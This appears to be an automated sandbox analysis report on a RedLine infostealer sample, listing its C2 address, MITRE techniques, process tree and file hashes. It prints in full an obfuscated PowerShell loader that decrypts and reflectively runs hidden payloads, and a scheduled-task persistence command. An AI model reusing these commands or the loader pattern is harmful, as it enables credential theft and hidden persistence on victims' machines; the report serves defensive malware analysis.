redline | hxxps://clck[.]ru/3AmuGC

Analysis

max time kernel
104s
max time network
105s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 14:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://clck.ru/3AmuGC

Score

10^/10

redline @neformal100lvl execution infostealer persistence spyware

Malware Config

Extracted

Family

redline

Botnet

@neformal100lvl

193.233.255.34:1111

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4468-399-0x00000000072E0000-0x0000000007332000-memory.dmp	family_redline

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	process
127	4468	powershell.exe
139	5240	powershell.exe
140	5240	powershell.exe
141	5240	powershell.exe
142	5240	powershell.exe
143	5240	powershell.exe
144	5240	powershell.exe
148	5240	powershell.exe
149	5240	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1424 powershell.exe
4468 powershell.exe
5240 powershell.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sxsczs = "C:\\Program Files\\- Windows.exe"	powershell.exe

Drops file in Program Files directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Program Files\- Windows.exe powershell.exe

description	ioc	process
File created	C:\Program Files\- Windows.exe	powershell.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2240 schtasks.exe
Modifies registry class 1 IoCs

Processes:

firefox.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings firefox.exe
NTFS ADS 1 IoCs

Processes:

firefox.exe

description ioc process

File created C:\Users\Admin\Downloads\nurik.new.bat:Zone.Identifier firefox.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

5808 NOTEPAD.EXE

pid	process
2240	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\nurik.new.bat:Zone.Identifier	firefox.exe

pid	process
5808	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
1424	powershell.exe
1424	powershell.exe
4468	powershell.exe
4468	powershell.exe
5240	powershell.exe
5240	powershell.exe
5240	powershell.exe
4468	powershell.exe
4468	powershell.exe
4468	powershell.exe
4468	powershell.exe
4468	powershell.exe
4468	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

firefox.exeAUDIODG.EXEpowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3436	firefox.exe
Token: SeDebugPrivilege	3436	firefox.exe
Token: 33	5136	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5136	AUDIODG.EXE
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	5240	powershell.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

firefox.exe

pid process

3436 firefox.exe
3436 firefox.exe
3436 firefox.exe
3436 firefox.exe
3436 firefox.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

firefox.exe

pid process

3436 firefox.exe
3436 firefox.exe
3436 firefox.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

firefox.exe

pid process

3436 firefox.exe
3436 firefox.exe
3436 firefox.exe
3436 firefox.exe

pid	process
3436	firefox.exe
3436	firefox.exe
3436	firefox.exe
3436	firefox.exe
3436	firefox.exe

pid	process
3436	firefox.exe
3436	firefox.exe
3436	firefox.exe

pid	process
3436	firefox.exe
3436	firefox.exe
3436	firefox.exe
3436	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	process	target process
PID 764 wrote to memory of 3436	764	firefox.exe	firefox.exe
PID 764 wrote to memory of 3436	764	firefox.exe	firefox.exe
PID 764 wrote to memory of 3436	764	firefox.exe	firefox.exe
PID 764 wrote to memory of 3436	764	firefox.exe	firefox.exe
PID 764 wrote to memory of 3436	764	firefox.exe	firefox.exe
PID 764 wrote to memory of 3436	764	firefox.exe	firefox.exe
PID 764 wrote to memory of 3436	764	firefox.exe	firefox.exe
PID 764 wrote to memory of 3436	764	firefox.exe	firefox.exe
PID 764 wrote to memory of 3436	764	firefox.exe	firefox.exe
PID 764 wrote to memory of 3436	764	firefox.exe	firefox.exe
PID 764 wrote to memory of 3436	764	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 2232	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 3448	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 3448	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 3448	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 3448	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 3448	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 3448	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 3448	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 3448	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 3448	3436	firefox.exe	firefox.exe
PID 3436 wrote to memory of 3448	3436	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://clck.ru/3AmuGC"
1⤵
- Suspicious use of WriteProcessMemory
PID:764
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://clck.ru/3AmuGC
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3436
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.0.948761258\124717945" -parentBuildID 20230214051806 -prefsHandle 1808 -prefMapHandle 1788 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {060dfd9d-7348-4cea-8315-888575530815} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 1892 2447fcb9258 gpu
    3⤵
    PID:2232
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.1.1703607064\1219344643" -parentBuildID 20230214051806 -prefsHandle 2476 -prefMapHandle 2472 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60664a33-bf16-43da-8f1c-b5e3e24e03dc} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 2488 24400191858 socket
    3⤵
    - Checks processor information in registry
    PID:3448
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.2.708460020\2072096402" -childID 1 -isForBrowser -prefsHandle 2992 -prefMapHandle 2988 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {93b4af89-37f4-476b-ad70-6d4420320797} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 3000 24402b3ac58 tab
    3⤵
    PID:760
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.3.1478035860\47476394" -childID 2 -isForBrowser -prefsHandle 3668 -prefMapHandle 3664 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7760548-6713-45a3-a6c3-9137a4bf946c} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 3680 244046f8558 tab
    3⤵
    PID:2452
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.4.1731765788\190644778" -childID 3 -isForBrowser -prefsHandle 5200 -prefMapHandle 5196 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b66985a-32c3-4574-a881-7eeca3a3fffd} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 5212 24405c54658 tab
    3⤵
    PID:1792
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.5.1435030502\2082438215" -childID 4 -isForBrowser -prefsHandle 5396 -prefMapHandle 5392 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd839d70-d97d-4d6a-880a-f0bf98104349} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 5404 24405ccce58 tab
    3⤵
    PID:976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.6.1430726149\1216636621" -childID 5 -isForBrowser -prefsHandle 5532 -prefMapHandle 5540 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8795af3-8c5c-4548-ad47-cc78cd8eeac0} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 5524 24405ccbc58 tab
    3⤵
    PID:3540
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.7.526838876\820828326" -childID 6 -isForBrowser -prefsHandle 3024 -prefMapHandle 3012 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca9f24db-5b7d-4bff-9eb7-088c0bdd6a99} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 3112 24402b3a358 tab
    3⤵
    PID:3404
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3436.8.2086656866\209819466" -childID 7 -isForBrowser -prefsHandle 6032 -prefMapHandle 3004 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1104 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {471c0c77-4a45-4bb2-b251-bfd5d7cfe99c} 3436 "\\.\pipe\gecko-crash-server-pipe.3436" 6004 24405ccb058 tab
    3⤵
    PID:2312

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x514 0x320
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5136

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5648

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\nurik.new.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:5808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\nurik.new.bat"
1⤵
PID:5836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P18ifcCBzSiyBMZ7t/92DzfEEOiWB3GmB8u/Mgq96gE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XtxZehJC17SekGwMyNi97g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ILhZH=New-Object System.IO.MemoryStream(,$param_var); $qnbTK=New-Object System.IO.MemoryStream; $mNcWm=New-Object System.IO.Compression.GZipStream($ILhZH, [IO.Compression.CompressionMode]::Decompress); $mNcWm.CopyTo($qnbTK); $mNcWm.Dispose(); $ILhZH.Dispose(); $qnbTK.Dispose(); $qnbTK.ToArray();}function execute_function($param_var,$param2_var){ $RQKZp=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BSkcv=$RQKZp.EntryPoint; $BSkcv.Invoke($null, $param2_var);}$VBZKk = 'C:\Users\Admin\Desktop\nurik.new.bat';$host.UI.RawUI.WindowTitle = $VBZKk;$VlTIu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VBZKk).Split([Environment]::NewLine);foreach ($eCJBm in $VlTIu) { if ($eCJBm.StartsWith(':: ')) { $NXiAz=$eCJBm.Substring(3); break; }}$payloads_var=[string[]]$NXiAz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\build.bat" "
    3⤵
    PID:3212
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BTcwzASLmoJ1ZL5KXzMu6IXsKQtggQBLKxtGQGMVivg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IBdf9vHDF4tEqjyQFw5gmw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oeZpq=New-Object System.IO.MemoryStream(,$param_var); $LpLBA=New-Object System.IO.MemoryStream; $yGtlM=New-Object System.IO.Compression.GZipStream($oeZpq, [IO.Compression.CompressionMode]::Decompress); $yGtlM.CopyTo($LpLBA); $yGtlM.Dispose(); $oeZpq.Dispose(); $LpLBA.Dispose(); $LpLBA.ToArray();}function execute_function($param_var,$param2_var){ $ioASE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AYHvj=$ioASE.EntryPoint; $AYHvj.Invoke($null, $param2_var);}$uUZMh = 'C:\Users\Admin\AppData\Local\Temp\build.bat';$host.UI.RawUI.WindowTitle = $uUZMh;$VBUID=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uUZMh).Split([Environment]::NewLine);foreach ($iadWj in $VBUID) { if ($iadWj.StartsWith(':: ')) { $IczyE=$iadWj.Substring(3); break; }}$payloads_var=[string[]]$IczyE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Client.bat" "
    3⤵
    PID:6060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bOD4h9qfBjd+kzpHQzYVb/xtS9DlFXtyObsrSvfEJ2M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K0AyqGjRg+qdDkB+SoyHFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Isgcp=New-Object System.IO.MemoryStream(,$param_var); $CsNhz=New-Object System.IO.MemoryStream; $MqzLV=New-Object System.IO.Compression.GZipStream($Isgcp, [IO.Compression.CompressionMode]::Decompress); $MqzLV.CopyTo($CsNhz); $MqzLV.Dispose(); $Isgcp.Dispose(); $CsNhz.Dispose(); $CsNhz.ToArray();}function execute_function($param_var,$param2_var){ $NyVPO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BQjsX=$NyVPO.EntryPoint; $BQjsX.Invoke($null, $param2_var);}$NxkMh = 'C:\Users\Admin\AppData\Local\Temp\Client.bat';$host.UI.RawUI.WindowTitle = $NxkMh;$FDOzr=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NxkMh).Split([Environment]::NewLine);foreach ($CzgRn in $FDOzr) { if ($CzgRn.StartsWith(':: ')) { $TZczo=$CzgRn.Substring(3); break; }}$payloads_var=[string[]]$TZczo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5240
    - - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "cmd" /tr "C:\Program Files\- Windows.exe" & exit
        5⤵
        
        PID:5568
      - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "cmd" /tr "C:\Program Files\- Windows.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:2240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\- Windows.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3fec295448f33fc791f27798e231cfa1

SHA1
40ba5b9773c7ff23002e2bbab326641ffd2da9ce

SHA256
fd436b2a1294081023a388f41db9c5bd0489c5ffe5e5f76ee386e6783f8dbef6

SHA512
f9d6229318da887e1af67f8d3ea1e953eb016126c08adca91d6d2e4852bec7361388939ddce294754668630dfa5176eeca89c8eacb07722a00f3560a7da0bc08

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afevplna.default-release\activity-stream.discovery_stream.json.tmp

Filesize
27KB

MD5
5cd2849d1f86ad50c92e5ef41d170772

SHA1
8a4e2046b8f4d7848ce4e1bf5e847cef91e7a6e1

SHA256
356746d303c4f6450b6c5e20fa3a9f27198c0a93cafb24f7b683fe709f354104

SHA512
7ffdbd297c4209919841d5d78bf4d8a0c0a1bd16e866876543dacfa49e161e2419156194f0d6be2ce90683d5ddb8f18a6f77f074ae65bb7a0286dcfa5d181412

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afevplna.default-release\cache2\doomed\29082

Filesize
9KB

MD5
0f909b3ea5eab02b499900f958a30b29

SHA1
e03173c18c5607b77621e5d084db1f2051438e22

SHA256
20cdf5250fe3d5ab6d937e4d2eaae3b4a6ec2777a9264afc22ce386bc1762e35

SHA512
4b6fcb67484a7d40396dcc5c3147e3ad3c0a6459cc8fcf4bf5a7210d09f2147e7f7ade56a3cd1e280485f75d5dc24895187acfda9f4d278d30da9aefce739932

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.bat

Filesize
442KB

MD5
445174d4cd2d2cb63afadf078fe499a5

SHA1
96e93f679b66c86a4516a92f49805e372a6f3aaa

SHA256
3cac34fe718eefafb30fcd2a443d1d919139371b35f5d42cd24ccf820b3baa1f

SHA512
77d79a932d52760a8712a4f548f249c47ff0878e06bba523fbdb74bf2f5112be204c2d9154b4cacfb8ffd0f72cd6fb84549ad39c813056b245558793733b6a5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fxjfo1pk.zy1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\build.bat

Filesize
189KB

MD5
c3a8464abf9fe7625215d938797b8e21

SHA1
03db36c72e71a3c164b3570b0e6c5cb6a21efa5e

SHA256
fa98b089863cf7714b49bfa4663c654efdb8b81812d0e9bde763d7597b43bf45

SHA512
7237d7f8162315950af8643912388b3c9133445569b04b1ea7ba45559a5e860a0ff6641306b9f09240728a213b031225cddfe959a2e159f4aa4c7197dec1d5fe

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\cookies.sqlite

Filesize
512KB

MD5
3e4d78b2d4126529c8f8ccff5754ec58

